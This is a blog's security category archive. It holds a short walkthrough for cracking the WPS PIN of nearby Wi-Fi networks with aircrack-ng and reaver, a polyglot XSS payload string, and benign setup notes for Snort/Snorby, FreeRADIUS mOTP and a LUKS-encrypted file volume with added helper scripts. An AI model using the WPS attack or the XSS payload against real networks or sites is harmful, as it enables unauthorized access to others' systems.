Category Archives: Security

Security & Hacking

How to hack WPS in Wi-Fi networks

Install reaver from here

Install the aircrack tools here

Or install them from the standard repository; on Ubuntu:

apt-get install aircrack-ng

Next, type
iwconfig

and find your wireless interface; on Ubuntu it is usually wlan0. Bring it up:
ifconfig wlan0 up

Next, run airmon-ng start wlan0. It creates a new interface, mon0, in monitor mode.

airodump-ng -i mon0
This shows all Wi-Fi networks around you; choose one and note its channel and MAC address.
CTRL+C

./reaver -b -c -vv

Then wait for the program to find the WPA key via the PIN.
Brute-forcing it takes no longer than 20 hours.

XSS vector

javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*'/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"

Snorby

Snort® is an open source network intrusion prevention and detection system (IDS/IPS).
Install it:
apt-get install snort-mysql
and add to /etc/snort/snort.conf:
output unified2: filename snort.log, limit 512

Snorby is a nice web interface built on Ruby on Rails, with usable and good-looking pieces such as Twitter Bootstrap.
git clone http://github.com/Snorby/snorby.git
cd snorby
bundle install
set the right MySQL settings in config/database.yml
set the right port, environment and paths in config/snorby_config.yml
bundle exec rake snorby:setup
bundle exec rails server -e production

But how do we get the data from Snort's output (the unified2 log configured above) into Snorby's database? The answer is Barnyard2.
wget http://www.securixlive.com/download/barnyard2/barnyard2-1.9.tar.gz
tar -zxf barnyard2-1.9.tar.gz && cd barnyard2-1.9
./configure --with-mysql
sudo make && sudo make install
sudo mv /usr/local/etc/barnyard2.conf /etc/snort
add at the end of /etc/snort/barnyard2.conf:

output database: log, mysql, user=snorby password=snorbypass dbname=snorby host=mysqlhostname sensor_name=sensor1

Launch barnyard2:

/usr/local/bin/barnyard2 -c /etc/snort/barnyard2.conf -d /var/log/snort -f snort.log -w /etc/snort/bylog.waldo \
 -G /etc/snort/gen-msg.map -S /etc/snort/sid-msg.map -C /etc/snort/classification.config
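
An added health check for the pipeline above (it is not part of the original post and not a Snorby or Barnyard2 tool): it finds the newest unified2 file Snort wrote, warns if that file is stale, and checks that the waldo bookmark exists and barnyard2 is running. The paths are the ones used on this page; the 300-second freshness threshold and the pgrep-based liveness check are assumptions, and everything can be overridden through environment variables.

```shell
#!/bin/sh
# Added example: sanity check of the Snort -> unified2 -> Barnyard2 -> Snorby pipeline.
# Paths default to the ones on the page; MAX_AGE (seconds) is an assumed threshold.

LOGDIR="${LOGDIR:-/var/log/snort}"
PREFIX="${PREFIX:-snort.log}"
WALDO="${WALDO:-/etc/snort/bylog.waldo}"
MAX_AGE="${MAX_AGE:-300}"

# newest_unified2 DIR PREFIX -> prints the path of the unified2 file with the
# highest timestamp suffix (snort names them <prefix>.<epoch>); returns 1 if none
newest_unified2() {
    dir=$1; prefix=$2
    name=$(ls -1 "$dir" 2>/dev/null | grep "^$prefix\.[0-9][0-9]*$" \
           | awk -F. '{print $NF, $0}' | sort -n | tail -1 | cut -d' ' -f2)
    [ -n "$name" ] || return 1
    printf '%s/%s\n' "$dir" "$name"
}

# file_age FILE -> seconds since the file was last modified (GNU or BSD stat)
file_age() {
    mtime=$(stat -c %Y "$1" 2>/dev/null || stat -f %m "$1")
    echo $(( $(date +%s) - mtime ))
}

# check_pipeline -> 0 when snort is writing fresh unified2 data, the waldo
# bookmark exists and barnyard2 is alive; 1 otherwise, with reasons on stderr
check_pipeline() {
    rc=0
    latest=$(newest_unified2 "$LOGDIR" "$PREFIX") || {
        echo "FAIL: no $PREFIX.* files in $LOGDIR (is unified2 output configured?)" >&2
        return 1
    }
    age=$(file_age "$latest")
    if [ "$age" -gt "$MAX_AGE" ]; then
        echo "WARN: $latest last written ${age}s ago (snort stalled or no traffic?)" >&2
        rc=1
    fi
    [ -f "$WALDO" ] || {
        echo "WARN: waldo $WALDO missing; barnyard2 will reprocess from the start" >&2
        rc=1
    }
    pgrep -x barnyard2 >/dev/null 2>&1 || { echo "WARN: barnyard2 is not running" >&2; rc=1; }
    return $rc
}

# Run the check when executed directly with an argument, e.g. from cron:
#   ./snort_pipeline_check.sh run
[ "${1:-}" = "run" ] && check_pipeline
```

If the newest file keeps ageing while barnyard2 is alive, Snort itself has stopped writing; if the file is fresh but Snorby shows nothing new, the problem is between barnyard2 and MySQL (check the output database line in barnyard2.conf and barnyard2's own log).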

That's all, have a good time =)

FreeRADIUS: add mOTP authentication

aptitude install ksh gcc libpam0g-dev -y
wget http://motp.sourceforge.net/pam_mobile_otp-0.6.2.tgz
tar -zxf pam_mobile_otp-0.6.2.tgz
cd pam_mobile_otp-0.6.2
make && make install
wget http://downloads.sourceforge.net/project/pam-script/pam-script-1.1.5.tar.gz
tar -zxf pam-script-1.1.5.tar.gz
cd pam-script-1.1.5
./configure && make && make install
wget http://motp.sourceforge.net/otpverify.sh
chmod +x otpverify.sh
wget http://motp.sourceforge.net/dictionary.motp
include this file from /etc/freeradius/dictionary (a $INCLUDE line pointing at dictionary.motp)
mkdir -p /var/motp/{cache,users}
chown -R freerad.freerad /var/motp
create the file /etc/freeradius/modules/MOTP (an instance of the exec module):
exec MOTP {
    wait = yes
    program = "/path/to/otpverify.sh %{User-Name} %{User-Password} %{reply:Secret} %{reply:Pin} %{reply:Offset}"
    input_pairs = request
    output_pairs = reply
}

add to the authenticate section of /etc/freeradius/sites-enabled/default (or whichever site you use):
Auth-Type External {
    MOTP
}

edit /etc/freeradius/users:
DEFAULT Auth-Type := External
    Fall-Through = Yes

yourlogin
    Secret = e37629f6d057dcc5,
    PIN = 1234,
    Offset = 0

/etc/init.d/freeradius restart
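
What otpverify.sh does for the MOTP module, as an added example written for this page (it is not the mOTP project's own script): an mOTP token is the first six hex characters of md5(<epoch seconds / 10, as an integer> || secret || pin), so the verifier recomputes tokens for every 10-second slot in an acceptance window and compares. The Secret and PIN are the values from the users file above. Assumptions: a window of ±180 seconds, Offset treated as a clock skew in seconds, and a per-user cache directory (defaulting to the page's /var/motp/cache) that records accepted tokens so the same token cannot be replayed inside the window.

```shell
#!/bin/sh
# Added example: a minimal Mobile-OTP (mOTP) verifier in POSIX sh.
# Token = first 6 hex chars of md5(<epoch/10 as integer> || secret || pin).
# Assumptions: +/-MOTP_WINDOW seconds are accepted, Offset is a skew in seconds,
# and accepted tokens are cached per user to reject replays.

MOTP_WINDOW=180                                # assumption: +/-3 minutes
MOTP_CACHE="${MOTP_CACHE:-/var/motp/cache}"     # page's cache dir, overridable

# md5 of stdin as a hex string (md5sum on Linux, md5 on BSD/macOS)
_md5() {
    if command -v md5sum >/dev/null 2>&1; then md5sum; else md5; fi
}

# motp_token SECRET PIN EPOCH -> prints the 6-char token for that 10 s slot
motp_token() {
    secret=$1; pin=$2; epoch=$3
    slot=$((epoch / 10))
    printf '%s%s%s' "$slot" "$secret" "$pin" | _md5 | cut -c1-6
}

# motp_verify USER SECRET PIN OFFSET TOKEN [NOW]
# returns 0 on success, 1 on a bad or out-of-window token, 2 on a replayed token
motp_verify() {
    user=$1; secret=$2; pin=$3; offset=$4; token=$5
    now=${6:-$(date +%s)}
    now=$((now + offset))                      # apply the user's clock skew

    # tokens are exactly six lowercase hex characters; reject anything else early
    case $token in
        [0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f]) ;;
        *) return 1 ;;
    esac

    t=$((now - MOTP_WINDOW))
    end=$((now + MOTP_WINDOW))
    while [ "$t" -le "$end" ]; do
        if [ "$(motp_token "$secret" "$pin" "$t")" = "$token" ]; then
            cache="$MOTP_CACHE/$user"
            mkdir -p "$MOTP_CACHE"
            # replay check: the same user already authenticated with this token
            if [ -f "$cache" ] && grep -qx "$token" "$cache"; then
                return 2
            fi
            echo "$token" >> "$cache"
            return 0
        fi
        t=$((t + 10))
    done
    return 1
}

# Called the way the MOTP module above calls otpverify.sh:
#   motp_verify "$1" "$3" "$4" "$5" "$2"   # User-Name Secret Pin Offset User-Password
```

The argument order in the last comment matches the program line of the MOTP module above (User-Name, User-Password, Secret, Pin, Offset); the user's password is the token. A real deployment would also expire cache entries older than the window, otherwise the per-user files grow without bound.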

Encrypted file-backed partition

How to create:

dd if=/dev/urandom of=/home/user/.hide bs=1GB count=10
dd if=/dev/urandom of=/home/user/.keyfile bs=1KB count=2
losetup /dev/loop1 /home/user/.hide
badblocks -s -w -t random -v /dev/loop1
cryptsetup luksFormat /dev/loop1 -d /home/user/.keyfile
cryptsetup luksOpen /dev/loop1 secret -d /home/user/.keyfile
mkfs.ext4 -j /dev/mapper/secret
e2fsck -f /dev/mapper/secret

How to mount:

losetup /dev/loop1 /home/user/.hide
cryptsetup luksOpen /dev/loop1 secret -d /home/user/.keyfile
mount /dev/mapper/secret /mnt/hide/

How to unmount:

umount /mnt/hide
cryptsetup luksClose secret
losetup -d /dev/loop1
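
The three procedures above wrapped into one script with the checks a practitioner wants, as an added example that is not from the original post: it refuses to overwrite an existing image, keeps the keyfile at mode 600 and verifies that before every open, picks a free loop device with losetup -f --show instead of hard-coding /dev/loop1 (and finds that device again at unmount time via cryptsetup status), and mounts with nodev,nosuid,noexec. Paths default to the ones on the page and can be overridden through environment variables; the badblocks pass is left out as an optional, slow step to run separately on the loop device.

```shell
#!/bin/sh
# Added example: create / mount / umount wrapper for a LUKS volume inside a file.
# Defaults are the page's paths; IMAGE, KEYFILE, MOUNTPOINT and MAPPER override them.

IMAGE="${IMAGE:-/home/user/.hide}"
KEYFILE="${KEYFILE:-/home/user/.keyfile}"
MOUNTPOINT="${MOUNTPOINT:-/mnt/hide}"
MAPPER="${MAPPER:-secret}"

# keyfile_ok FILE -> 0 if the file exists and is not readable by group or others
# (mode 600 or 400); a world-readable keyfile makes the encryption pointless
keyfile_ok() {
    f=$1
    [ -f "$f" ] || return 1
    mode=$(stat -c %a "$f" 2>/dev/null || stat -f %Lp "$f")
    case $mode in
        600|400) return 0 ;;
        *) return 1 ;;
    esac
}

vault_create() {
    [ "$(id -u)" -eq 0 ] || { echo "must run as root" >&2; return 1; }
    [ -e "$IMAGE" ] && { echo "$IMAGE exists, refusing to overwrite" >&2; return 1; }
    umask 077                                   # new files private from the start
    dd if=/dev/urandom of="$IMAGE" bs=1GB count=10
    dd if=/dev/urandom of="$KEYFILE" bs=1KB count=2
    chmod 600 "$KEYFILE"
    keyfile_ok "$KEYFILE" || return 1
    loop=$(losetup -f --show "$IMAGE") || return 1
    cryptsetup luksFormat -q "$loop" -d "$KEYFILE" || { losetup -d "$loop"; return 1; }
    cryptsetup luksOpen "$loop" "$MAPPER" -d "$KEYFILE" || { losetup -d "$loop"; return 1; }
    mkfs.ext4 -q "/dev/mapper/$MAPPER"
    e2fsck -f "/dev/mapper/$MAPPER"
    cryptsetup luksClose "$MAPPER"
    losetup -d "$loop"
}

vault_mount() {
    keyfile_ok "$KEYFILE" || { echo "keyfile missing or too permissive" >&2; return 1; }
    [ -e "/dev/mapper/$MAPPER" ] && { echo "$MAPPER is already open" >&2; return 1; }
    loop=$(losetup -f --show "$IMAGE") || return 1
    cryptsetup luksOpen "$loop" "$MAPPER" -d "$KEYFILE" || { losetup -d "$loop"; return 1; }
    mkdir -p "$MOUNTPOINT"
    # the volume holds data, not programs: no device nodes, setuid binaries or execution
    mount -o nodev,nosuid,noexec "/dev/mapper/$MAPPER" "$MOUNTPOINT" || {
        cryptsetup luksClose "$MAPPER"; losetup -d "$loop"; return 1; }
}

vault_umount() {
    # recover the loop device behind the mapping instead of assuming /dev/loop1
    loop=$(cryptsetup status "$MAPPER" | awk '/device:/ {print $2}')
    umount "$MOUNTPOINT"
    cryptsetup luksClose "$MAPPER"
    [ -n "$loop" ] && losetup -d "$loop"
}

if [ $# -gt 0 ]; then
    case $1 in
        create) vault_create ;;
        mount)  vault_mount ;;
        umount) vault_umount ;;
        *) echo "usage: $0 create|mount|umount" >&2; exit 2 ;;
    esac
fi
```

Usage: ./vault.sh create, then ./vault.sh mount and ./vault.sh umount. The keyfile lives next to the image in the page's layout, so anyone who can read both gets the data; keeping the keyfile on separate removable media, or adding a passphrase slot with cryptsetup luksAddKey, is the usual improvement.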